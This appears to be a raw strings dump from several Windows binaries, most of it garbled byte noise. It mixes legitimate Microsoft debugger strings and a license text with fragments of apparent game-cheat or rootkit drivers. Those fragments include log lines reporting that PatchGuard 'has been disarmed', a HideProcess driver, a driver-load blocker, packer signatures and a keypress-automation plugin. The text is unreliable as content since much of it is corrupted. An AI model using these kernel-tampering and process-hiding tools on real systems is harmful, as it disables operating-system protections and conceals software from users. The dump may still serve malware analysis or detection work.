".DBV
&'()* ,-
./012345
6789:;<=
ult .arg
"Ñ8
~ ~!~"~#
33%XD'
.QHK/
pp2p.oD
i.yCb
t.GSoK
*X.Ehm
/A#.Yg \
0$%UTu/"4
%d"U0
'()* ,-.
/0123456
789:;<=>
T.Pt7
"G%SEwj<
'pa"%C
?#%X.2y
-(Q%Dn3
@%h%XC
(p?%u%
@cmd.0extCOM'SPc
Y.nPF
.qi8p
@$.SW2;'~
!%UgFXU
='T%C~9w"
4]rP
d.DL2
U~R%s
=#-a}
L<%u_
gouR.nJ
4_.yT
.HB1!
^Ñ!
u(v%DV
q 0%X
?#%X.y
z(J.vb
JL?P%sx
L32.dl;
bEXer
= >$?(?,?0'4
 :1%S
Tp.Ed
.MPRES
#@d%S
_.NK|
,.RpY
.erAC
&.Fso
p.BRJ?
p>%U,
msvcrt
m!.oQ
biansu.dll
g.ke(
r32.dl
X(.vO
Windows 10 Professional
\\.\DenyLoadDriver
\DenyLoadDriver.dll
c:\users\hwl\desktop\20160430\bin\amd64\DenyLoadDriver.pdb
.sedata
.idata
w.Ewo[
&&&&6666????
""""****
2222::::
$$$$\\\\
00006666
####====
SESDKDummy64.dll
.rm|O
lŸD
%s*xl
?.hi$
jh%U@
K:\UW
H:NJ.NC
I&k%d$
.Nxup
#%dYd
T".fA
rmsGrEM
y.uQLfZ
exú
DuDp
fe|P.nT
%Xx]e
gb.ho
.Mrda
.qpsjA
}.Ia7
KeYTn
(*.AXN
D .fD
.RSDS
f:\programming\my\sell\2016-03-19\sys\objfre_win7_amd64\amd64\lonerSpeed_v40.pdb
KeDelayExecutionThread
Safengine Shielden v2.3.7.0
t$.fA
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.Shanghai Bo Yi Information Technology Co. Ltd.1:08
shielden_user@safengine.com1
shielden_user@safengine.com0]
LhXXp://pki-crl.symauth.com/ca_3e5451d77b370c64c3bd39d10f35bd21/LatestCRL.crl07
hXXp://pki-ocsp.symauth.com0
51153809
ehXXp://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.crl0
.rdata
.data
szIN: %s
password right!
password wrong!
uUt%S
.vp;q;I
$%Xb:
` .fD
&.Uox
.cn>:
.Zld!0
h.yY:
N3M%U
, J.pX
].Kdq
:.vkP<
.kFlb
tjb.vkP
.ZFZ?
5J.me
Dj.Mc
?.GpfpO8
f:\programming\my\sell\2015-10-19\sys\objfre_win7_amd64\amd64\lonerSpeed_v40.pdb
Dntoskrnl.exe
HAL.dll
D$ý
rmntoskrnl.exe
\win8pg.exe
`.rdata
@.data
@.rsrc
@.reloc
GetProcessWindowStation
imagehlp.dll
CreatePipe
KERNEL32.dll
USER32.dll
SHELL32.dll
GetProcessHeap
GetCPInfo
zcÁ
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
hXXp://VVV.yxbsq.com/show.asp?id=54
passkpp
\passkpp.dll
B.rsrc
AESKEYGENASSIST
VAESKEYGENASSIST
d:\igs\driver\x64hook\x64pass\x64\amd64\x64pass.pdb
##%%&'%#&'&'
% & ' ( ) *  
, - . / 0 1 2
3 4 5 6 7 8 9
-!.!/!0!8
" "!"""#"$"%"&"'"(")"*" ","-"
/"0"1"2"
# #!#"###$#%#
&#'#(#)#*# #,#-#
.#/#0#1#2#3#4#
5#6#7#8#9#:#
;#<#=#>#?#
#8@9@:@;@
#[@\@]@^@
m'D:.Gu6
zBS%d
\Fixblue.sys
%f)prA%H
V-T}0
MH$T2%U
.ayU(
wt%s}
.qKWPE
.ZB))DyqY
.G.Dr
M.GO[
>j`.nu
s WluDp
Z.Yn{K
z-4b}
hid.dll
iphlpapi.dll
mscoree.dll
mscorwks.dll
mscorsvr.dll
KernelBase.dll
mscoreei.dll
clr.dll
diasymreader.dll
SEGetNumExecUsed
SEGetNumExecLeft
SESetNumExecUsed
SEGetExecTimeUsed
SEGetExecTimeLeft
SESetExecTime
SEGetTotalExecTimeUsed
SEGetTotalExecTimeLeft
SESetTotalExecTime
SECheckExecTime
SECheckTotalExecTime
IPHLPAPI.DLL
msvcrt.dll
_amsg_exit
PSAPI.DLL
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
ADVAPI32.dll
%X#l]L
x.yj(
}y%x#K
lßD
-Dv}l
%uAZ-
i*.nP5
AF.nk
.cD):S
a`4%c
%cJ*#
%cWqL&
).cu?v\
7*%c^
.qpsj
%UZP-
Kz%Dx
ZudP
%xS&NQy
Tk.EPx
|'ý
'{.qAZ<
T"ý
U.CxU
kV.Br\
-Q9};T*
<%S&4
>,%s9
[I.Ty
.fs v
{r#.Utt
BYd{.VQhSj
K.vQt
udp}q{f
$c.%X
%CX4A9
'%sZ(
).nl&~
#.vQD[f`#
C8$.uc
}%Ush
F}.yp
\s.VAi
%Ch:4
=T7_J%X
%X3nI
O.aPJ
%1U=Q
k.EPx
\s.EP
{.vQ|
[5.Be
c.BMF=@A
Z%.Ba
.lG8h
y|g%C
>rDF%Dwc
Vi-N}
PX IV%C;e=
g.eUh
F%c{M-&
;,.fEN
=I.GM
C:\Users\Administrator\Desktop\FixBlue
\DisPG\x64\Release\Fixblue.pdb
)KERNEL32.dll
%FormatMessageW
d$ú
%Sleep
?PSAPI.DLL
RegCreateKeyExW
SHLWAPI.dll
SHDeleteKeyW
SHELL32.dll
 BKERNEL32.dll
[%4x:%4x] Initialize : Starting DisPG.
[%4x:%4x] Initialize : PatchGuard has been disarmed.
[%4x:%4x] PatchGuard %p : KiScbQueueScanWorker (%p) was dequeued.
[%4x:%4x] PatchGuard %p : FsRtlUninitializeSmallMcb (%p) was dequeued.
[%4x:%4x] PatchGuard %p : Pg_IndependentContextWorkItemRoutine was called.
[%4x:%4x] PatchGuard ???????????????? : KeDelayExecutionThread is returning to Pg_SelfEncryptWaitAndDecrypt (%p).
[%4x:%4x] PatchGuard ???????????????? : KeDelayExecutionThread is returning to FsRtlMdlReadCompleteDevEx (%p).
[%4x:%4x] PatchGuard ???????????????? : KeWaitForSingleObject is returning to FsRtlMdlReadCompleteDevEx (%p).
[%4x:%4x] PatchGuard %p : XorKey %p
C:\Users\Jank\Desktop\PgResarch-master\DisPG\x64\Release\DisPG.pdb
ZwQueryValueKey
ZwOpenKey
KeStallExecutionProcessor
HAL.DLL
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
\symsrv.sys
`.data
@.idata
Invalid parameter passed to C runtime function.
LZ32.dll
Cabinet.dll
WININET.dll
WINHTTP.dll
GDI32.dll
sdktools\debuggers\symsrv\symsrv.cpp
sdktools\debuggers\symsrv\common.cpp
Assertion at %s, line %d.
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestW
WinHttpOpen
WinHttpCloseHandle
WinHttpReadData
WinHttpSendRequest
WinHttpQueryOption
lz32.dll
winhttp.dll
cabinet.dll
sdktools\debuggers\symsrv\store.hpp
sdktools\debuggers\symsrv\store.cpp
sdktools\debuggers\symsrv\ini.cpp
MICROSOFT DEBUGGING SYMBOLS AND EXECUTABLES
support services
INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices for the purpose of debugging a validly licensed copy of Microsoft operating system software, or one or more applications running on a validly licensed copy of a Microsoft operating system.
2. SCOPE OF LICENSE. The software is licensed, not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation, you may use the software only as expressly permitted in this agreement. In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not
6. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations, end users and end use. For additional information, see VVV.microsoft.com/exporting.
7. SUPPORT SERVICES. Because this software is
we may not provide support services for it.
8. ENTIRE AGREEMENT. This agreement, and the terms for supplements, updates, Internet-based services and support services that you use, are the entire agreement for the software and support services.
10. LEGAL EFFECT. This agreement describes certain legal rights. You may have other rights under the laws of your country. You may also have rights with respect to the party from whom you acquired the software. This agreement does not change your rights under the laws of your country if the laws of your country do not permit it to do so.
bec, Canada, certaines des clauses dans ce contrat sont fournies ci-dessous en fran
crit certains droits juridiques. Vous pourriez avoir d
6.3.9600.16384
symsrv.pdb
tý9
InternetCrackUrlW
HttpAddRequestHeadersW
WinHttpReceiveResponse
WinHttpSetOption
WinHttpConnect
WinHttpQueryHeaders
WinHttpGetDefaultProxyConfiguration
WinHttpQueryDataAvailable
WinHttpOpenRequest
SYMSRV.DLL
httpCloseHandle
httpOpenFileHandle
httpOpenFileHandleW
httpQueryDataAvailable
httpReadFile
RegOpenKeyExW
WS2_32.dll
ChXXp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0X
<hXXp://VVV.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0
*31595 4faf0b71-ad37-4aa3-a671-76bc052344ad0
EhXXp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0
$Microsoft Root Certificate Authority0
?hXXp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T
8hXXp://VVV.microsoft.com/pki/certs/MicrosoftRootCert.crt0
$Microsoft Root Certificate Authority
.tq[m
hXXp://VVV.microsoft.com/windows0
EhXXp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_2010-07-06.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicCodSigPCA_2010-07-06.crt0
)Microsoft Root Certificate Authority 20100
EhXXp://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0
1hXXp://VVV.microsoft.com/PKI/docs/CPS/default.htm0@
EhXXp://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0Z
>hXXp://VVV.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0
\dbghelp.sys
Module %d
11.00.65501.17017
S_EXPORT
LF_VFTPATH
LF_VFTPATH_16t
'%s'!'%s'
.Base
@ILT %d(
RPCRT4.dll
EXPORT
Stack debugging mask is 0xx, output via %s
VC7 FPO - %sabled
LOP frame unwind - %sabled, symbol info %sabled, return search %sabled
Force LOP frame unwind - %sabled
Added force-ebp region %I64x:%x
Unable to add force-ebp region %I64x:%x
x`x
Couldn't find process 0x%x
%d loaded modules...
0x%s -
Loaded Module Info: [%s]
Couldn't find process 0x%x while looking for %s
%s not found
Load Report: %s
%s - ignored because unknown file extension.
%s - ignored. The input name/address could not be resolved to a loaded module.
X-X-X-XX-XXXXXX
Timestamp: %X
SizeOfImage: %X
dbg: %s
pdb: %s
pdb sig: %X
pdb sig: %s
age: %X
Couldn't load %s
Loaded pdb is %s
Unknown error, HRESULT is %x
MATCH: %s and %s
MISMATCH: %s and %s
age MISMATCH: %s and %s
sig MISMATCH: %s and %s
%s <module> [symbol]
%s tests the validity of a module against a symbol file.
Inline debugging mask is 0xX
Could not find module %s
Omap Block: [%s]
error 0x%x looking for block
Dump OMAP: [%s]
%8x <-%8x
0x%I64x: %8x ->%8x
Home directory is %s
error 0x%x setting home directory to %s
%s!%s
Source Files: [%s]
%c%c%c%c -
Sig: %lx, Age: %lx,%sPdb: %s
GUID: {X-X-X-XX-XXXXXX}
Age: %lx, Pdb: %s
Module: %s
Base Address: %p%s
Image Name: %s
Machine Type: %d
Size: %x
Characteristics: %lx %s %s
- Image read successfully from %s.
from %s.
Compiler: %s - front end [%d.%d bld %d] - back end [%d.%d bld %d]
Windows GUI
Windows CUI
Windows Boot Application
Export
Import
Bound Import
Import Address Table
Delay Import
Can't read file header: error == %d
File Type: EXECUTABLE IMAGE
%8hX machine (%s)
%u.u
%8s linker version
%8hX subsystem (%s)
%8s operating system version
%8s image version
%8s subsystem version
High entropy VA supported
AppContainer executable
%8lX [%8lX] address [size] of %s Directory
%8lX %s
%8x %8x %8x
Image Name: %s
Format: NB10, %x, %x, %s
Format: RSDS, guid, %x, %s
Format: UNKNOWN - sig = 0x%x
Debug Directories(%d)
%*s : %s [0x%I64X to 0x%I64X) (len 0x%-3X): [- others]: [0x%-3X offset][%x,%s,%s,%x,%x]
Error: Couldn't find process 0x%x
Current RVA: 0x%x
Inline: (%S,%I64x,%x,%I64x)
Symbol: (%S,%I64x,%x,%I64x)
%s - %S
SrcSrvExecTokenW
closing session: %s
Creating FPO for x from DIA
[_:][_:]
Invalid SWD_DECODE.SegSize %d
processed a user callback, args %u
processed an exception dispatch, ret %x
call search %x to %x for call to %x
%x: potential call ret-addr %x, scan %x:%x
direct call %x: %s
stack %x, found direct call %x to %x
indirect call %x: %s
stack %x, found indirect call %x to %x
unk indirect call %x
stack %x, guessing likely direct call
stack %x, guessing likely indirect call
stack %x, guessing likely unk indirect call
stack %x, guessing direct call
stack %x, guessing indirect call
stack %x, guessing unk indirect call
accum failed, %s
accum frame: ebp %d, eip %d, esp %d, frame %d, unk %d, fp %d, uebp %d
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteAtOffset.Write(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteTokenInformation.Write(0x%x,%d,%d) failed, 0xx
WriteTokenInformation.ProcessToken(%d,%d) failed, 0xx
WriteTokenInformation.ThreadToken(%d,%d) failed, 0xx
WriteTokenInformation.Write(%d,%d)(%d,%d) error.
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetCpuInfo failed, 0xx
WriteSystemInfo.GetOsCsdString failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed 0xx, skip.
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed 0xx, ABORT.
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
Kernel minidump write failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record size (0x%x)
Invalid context size (0x%x)
Invalid exception record parameter count (0x%x)
GetSystemType.GetCpuType failed, 0xx
GetSystemType.GetOsInfo failed, 0xx
Invalid pointer size (0x%x)
Invalid page size (0x%x)
Invalid function table size (0x%x)
Invalid function table entry size (0x%x)
Invalid instruction window size (0x%x)
Invalid CPU type (0x%x)
Invalid dump type 0x%x
Dump type requires streaming but output provider does not support streaming
Write.Start failed, 0xx
y\Alloc(0x%x) failed
Realloc(0x%x) failed
Thread(0x%x) will not be included
Memory read failure at %I64x:%x ignored by callback
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
ThreadToken(%d,%I64x,%d,%d)
ThreadToken_SessionId(0xX,%d,%d,%d)
ThreadToken_User(0xX,%d,%d,%d)
ThreadToken_Group(0xX,%d,%d,%d)
ThreadToken_PrimaryGroup(0xX,%d,%d,%d)
ThreadToken_Privileges(0xX,%d,%d,%d)
ThreadToken_Statistics(0xX,%d,%d,%d)
ThreadToken_RestrictedSids(0xX,%d,%d,%d)
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
Unable to add module "%ws" PE header, (0xX,0x%I64x)(%x,%x)
Unable to add directory %x from module "%ws", (%x,%x,%x)
Unable to add debug directory %x from module "%ws", (%x,%x,%x,%x)
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenAllocateProcessObject.GetCpuPowerInfo() failed, 0xx
ProcessToken(%d,%I64x,%d,%d)
ProcessToken_SessionId(0xX,%d,%d,%d)
ProcessToken_User(0xX,%d,%d,%d)
ProcessToken_Groups(0xX,%d,%d,%d)
ProcessToken_PrimaryGroup(0xX,%d,%d,%d)
ProcessToken_Privileges(0xX,%d,%d,%d)
ProcessToken_Statistics(0xX,%d,%d,%d)
ProcessToken_RestrictedSids(0xX,%d,%d,%d)
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
GenGetAuxMemory(%ws) failed, 0xx
GenInvokeEnumStackProviders(%ws) failed, 0xx
GenGetHandleData.Start(0x%x) failed, 0xx
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.InfoHdr.Write(0x%I64x) failed, 0xx
GenWriteHandleData.Info.Write(0x%I64x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleOperations stream RVA overflow
GenWriteHandleOperations.Seek(0x%x) failed, 0xx
GenWriteHandleOperations.List.Write(0x%x) failed, 0xx
GenWriteHandleOperations.Ops.Write(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\KnownFunctionTableDlls
kernelbase.dll
api-ms-win-core-toolhelp-l1-1-0.dll
api-ms-win-core-kernel32-private-l1-1-0.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
powrprof.dll
verifier.dll
psapi.dll
api-ms-win-core-psapi-obsolete-l1-1-0.dll
version.dll
Unable to get basic symbol unwind info at %I64X:%X
Got unwind info length %X from symbols
Insufficient unwind info in symbols for %I64X:%X
Dbh-%s in: PC %8X, SP %8X, FP %8X, RA %8X
Dbh-%s in: PC %I64X, SP %I64X, FP %I64X, RA %I64X
Dbh-%s out: status %X, PC %8X, SP %8X, FP %8X, RA %8X
Dbh-%s out: status %X, PC %I64X, SP %I64X, FP %I64X, RA %I64X
DIA search %x (%x) %s loc %x regs %x callee params %x
GetUserExceptionDispatcherContext(%X) = %X
taking smaller analysis prologue push count, %d < %d
RecoverFrame: func %X, bytes %X, prologue %x
unable to read code at %X
unknown code sequence X at %X
unknown out-prologue code X at %X
esp changed to %d (%s)
moved ebp to stack at %d
moved esp %X to ebp
push reg, num prologue %d
pop reg, num prologue %d
ebps %d:%d, ebpf %d, ebpesp %d
Applying SWU for eip %X esp %X ebp %X args %X
Result eip %X esp %X ebp %X args %X
Apply failed, x
ignoring invalid managed indirect call %X at %X
ignoring cross-image indirect call %X at %X
SearchForReturnAddress: stack %X, EBP %X func %X:%X, guess %d:%X
accepted zero return addr at %X
BOP, use %X
unreadable call site, use %X
swu found call %X for stack %X
dircall from %X to %X at %X
found function, use %X
found funclet call, use %X
found hot-patch function, use %X
direct call reaches %X, use %X
exact function, use %X
quick accept call to unreadable ind jmp, use %X
found unknown jmp/call, use %X
indcall from %X to %X at %X
exact ind call, use %X
found ind hot-patch function, use %X
ind call reaches %X, use %X
quick accept ind call, use %X
found ind call, use %X
choose guessed direct call through EBP, use %X
choose indirect call through EBP, use %X
found unk slot 0 call, use %X
choose guessed direct call, use %X
found call to unreadable ind jmp, use %X
found unknown jmp/call in guess region, use %X
found call to invalid ind jmp, use %X
no potential return addresses found, use %X
validated raw known ebp %X at %X
validated raw ebp %X at %X
raw ebp at %X does not appear to be valid
SearchForFramePointer: regs %X, ret esp %X, non-fpo %X, numregs %d
moved ebp to stack at %X
Unwinding trap frame for eip %X esp %X ebp %X
Unwinding TSS frame for eip %X
KiUserCallbackDispatcher(%X, %X) at %X, ret eip %X
Applying frame data program for eip %X esp %X ebp %X
Result eip %X esp %X ebp %X
Apply failed, 0xx
Unwind%s: eip %X, esp %X, ebp %X, func %X, first %d, FPO [%d,%d,%d]
UnwindUnknown: eip %X, esp %X, ebp %X, first %d
! Ignoring invalid ebp %X (%X), using esp %X
Unknown code, restore ebp from %X (%X)
! Unable to read ebp from %X, using %X
! Ignoring ebp %X
Prol: RIP %I64X, 0x%X bytes in function at %I64X
Unwind info has 0x%X codes
X: Code %X Info %x CodeOffs X, RSP %I64X
Prol: Invalid unwind op %X at index %X
AMD64_UWOP_PUSH_NONVOL Register %x RSP %I64X
Prol: Op %X memory read failed at %I64X
AMD64_UWOP_ALLOC_LARGE FrameOffs %x %x RSP %I64X   %x
AMD64_UWOP_ALLOC_LARGE FrameOffs %x RSP %I64X   %x
AMD64_UWOP_ALLOC_SMALL Info %x RSP %I64X
AMD64_UWOP_SET_FPREG FrameReg %x FrameOffs %x RSP %I64X
AMD64_UWOP_SAVE_NONVOL Register %x FrameBase %I64X FrameOffs %x RSP %I64X
AMD64_UWOP_SAVE_NONVOL_FAR Register %x FrameBase %I64X FrameOffs %x %x RSP %I64X
AMD64_UWOP_EPILOG OpInfo: %x
AMD64_UWOP_SPARE OpInfo: %x FrameOffs %x
AMD64_UWOP_SAVE_XMM128 Register %x FrameBase %I64X FrameOffs %x RSP %I64X
AMD64_UWOP_SAVE_XMM128_FAR Register %x FrameBase %I64X FrameOffs %x %x RSP %I64X
AMD64_UWOP_PUSH_MACHFRAME Info %x RetAddr %I64X StkAddr %I64X RSP %I64X
Prol: Op %X memory read 1 failed at %I64X
Prol: Op %X memory read 2 failed at %I64X
Prol: Unwind failed, 0xX
m_CallPointer = X, PC = X, SP = X, FuncStart = X, HaveRfe = %d
m_CallPointer = %x, PC = %x, SP = %x, FuncStart = %x, module base = %x
PC is leaf function, LR is %x
.xdata unwind record is x, InfoSize %u, Ret %x
Return m_CallPointer = %x, PC = %x, SP = %x, LR = %x
Body region desc B1: copy=%d, label_num=%d
Epilog desc B2: ecount=%d, LEB128(slot)=%d
Epilog desc B3: ecount=%d, LEB128 val=%d
Body region desc B4: copy=%d, label_num=%d
Undefined Label %d
Can't get unwind info at %I64x:%x, 0xx
Region R1 format: body=%x, length=%d
Region R2: body=0, length=%d
Region R3: body=%x, length=%d
MiscMask = 0x%x
Restored %s to %I64x
FrMask = 0x%x
GrMask = 0x%x
Prolog P7: type=%d slot= %d
Prolog P8: type=%d slot= %d
Format P9 not supported yet!
Region R2: rmask=%x,grsave=%d,length=%d
Prolog P1: brmask=%x
Prolog P2: brmask=%x reg base=%d
Prolog P3: type=%d reg=%d
Prolog P5: grmask = %x, frmask = %x
Prolog P6: is_gr = %d, mask = %x
Prolog P7: type=%d spoff = %d
Prolog P7: type=%d pspoff= %d
Prolog P7: type=%d Slot=%d FrameSize=%d
Prolog P7: type=%d, spillbase=%d
Unsupported Unwind Descriptor!
Prolog P8: type=%d spoff= %d
Prolog P8: type=%d pspoff= %d
Can't find runtime function entry info for x`x, results might be unreliable!
Func %X start %X size %X
Leaf %X LR %X
operator
dbghelp.pdb
tÙM
3333333
fD;.sE
tÙ@
Pt%D;
Eú#
xÿf
t.fD9s
%UUUU 
dbghelp.dll
FindExecutableImage
FindExecutableImageEx
FindExecutableImageExW
ReportSymbolLoadSummary
SymFindExecutableImage
SymFindExecutableImageW
SymSrvGetFileIndexes
SymSrvGetFileIndexesW
RegQueryInfoKeyW
RegEnumKeyExW
<requestedExecutionLevel
name="Microsoft.Windows.DebuggersAndTools"
version="1.0.0.0"
<description>Windows Debuggers and Tools</description>
<!-- Windows 6.3 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 6.2 (Win 8) -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 6.1 (Win 7) -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 6.0 (Vista) -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
`.vmp1
#.pYS
! .mrIkO
LX%U{
P.JAp
J8.Sf
wt<E.lG)WY
L.dDV
jK.BXQ
}s.Csk
n%F;7
(5%SL
EYW?%u
^.CgH
Q.cd{
.Kax~\K
`%d)k`@
`"SK.FB
=M4%x
.aDOe>
$f%F-
%u:2v77
/cRtn
M5v_.YH
f:\programming\my\sell\2016-03-19\sys\objfre_wxp_x86\i386\lonerSpeed_v40.pdb
<ntoskrnl.exe
kEYr
r_L.Ht
{w.Gl
U:\r2
s0r.Ar
keybq
B f.PH
.QfwD
5$w.fU
@%C(cH}
=-5Q}`
8u.ShpxW
f:\programming\my\sell\2015-10-19\sys\objfre_wxp_x86\i386\lonerSpeed_v40.pdb
yxbsq@foxmail.com
VVV.yxbsq.com
c:\users\hwl\desktop\20160430\bin\i386\DenyLoadDriver.pdb
n'Y?.Yq
Y..QfW
nz.KH
.efAd
>m.cOs
.Ju_ya$-)
ZI%XNX
.yPMV
/8%\{##?
H,.dOu
P%f$P*
F=.cS
eGp.bg
\GA%xy
<%StV
J`.wa
:.ubh
2u.vv
86%D&Z
}E%FlR
]r.xS
%fiX`3
u.KQ@Cz}
SQLb
%sf|@Y~
9-B.GdT
.xJ"*
[-6}h
uOu.LDC
C.lCG
s%C<"
,l%C Q
DD.fa
.mG?"
3p.dJ
8%XorfM
q.Px/
j.zSQ<
.hAYE
a%CrA
sM=%X
.PrO)=gzY
A$@.LM
_A.bs
}.PwO?n
g9.ER
%UU$(8
-`x.Dx@
p3%CUYQ
n.QrR{
vs.qT
.jo.V
%UWA8D
$.VW{
c%DL`
.KZ7r:
1)Ì
Y4@uDp
7%Sdj
%f{ s|f,
.TBYN^
|'%c/<;
DOb}%F
 $*y/2t.xb
^B2.jL
.HSuc
rl%FgQ
'HDPlug.DLL'
HD.HDSoft = s 'HDPlugInterFace Class'
CLSID = s '{7EEE458C-7C90-4871-B3EE-0F2AD7EDAE18}'
CurVer = s 'HD.HDSoft'
ForceRemove {7EEE458C-7C90-4871-B3EE-0F2AD7EDAE18} = s 'HDPlugInterFace Class'
ProgID = s 'HD.HDSoft'
stdole2.tlbWWW
BkeypadWW
.aKeyDownW
MKeyUpWWWd
KeyPressd
KeyPressStrW
pOkey_strWd
KeyPressChard
qHKeyDownCharWd
KeyUpCharWWWd
.retstrWWd
iRSetKeypadDelayWWd
>SGetWindowStateWWd
SetWindowStateWWd
U@SetWindowSizeWWWd
SetShowErrorMsgW
EnableRealKeypadd
WaitKeyW
KLoginWWW
password
keyWd
xModifyPasswordWW
oldPasswordW
NewPasswordWd
port
.yclientNumWWW
Created by MIDL version 7.00.0555 at Mon Jul 04 17:45:17 2016
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
gdiplus.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
RegOpenKeyW
HDPlug.DLL
Login
ModifyPassword
HideProcess.sys
: Running on Windows 2003
: Running on Windows XP
: Running on Windows 2000
: Running on Windows Vista
cdkey\sys\i386\Protect.pdb
\Dult.sys
netsh.exe
.rb)6t$`6
wI.VAj
.CR7C- G
!"#$%&'()* ,-./
|.DLL@&
C:\Ks\BLACK\8
.pdbk
E_Loader.dll
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
COMCTL32.dll
MSIMG32.dll
